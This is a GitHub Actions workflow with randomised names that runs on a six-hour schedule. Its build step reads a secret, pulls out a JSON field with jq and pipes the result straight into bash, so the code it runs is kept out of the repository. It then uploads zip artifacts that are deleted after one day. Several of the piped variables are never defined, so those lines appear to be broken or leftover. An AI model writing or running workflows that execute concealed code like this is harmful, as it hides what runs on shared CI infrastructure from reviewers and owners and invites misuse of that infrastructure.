name: jinshenghuangzhu
on:
  workflow_dispatch:

  schedule:
    - cron: '55 5,11,17,23 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jinshenghuangzhu
        env:
          p8: ${{ secrets.p8 }}
        run: |
          printf '%s' "$p8" | jq -r .cght3 | /bin/bash
          printf '%s' "$gowj42" | jq -r .bnr43 | /bin/bash
          printf '%s' "$ql7080" | jq -r .bjum524 | /bin/bash
          echo $hzpwa41077 | jq -r .a25 | /bin/bash
          printf '%s' "$hi76" | jq -r .nio542 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: eTsw309e
          path: "*.zip"
          retention-days: 1
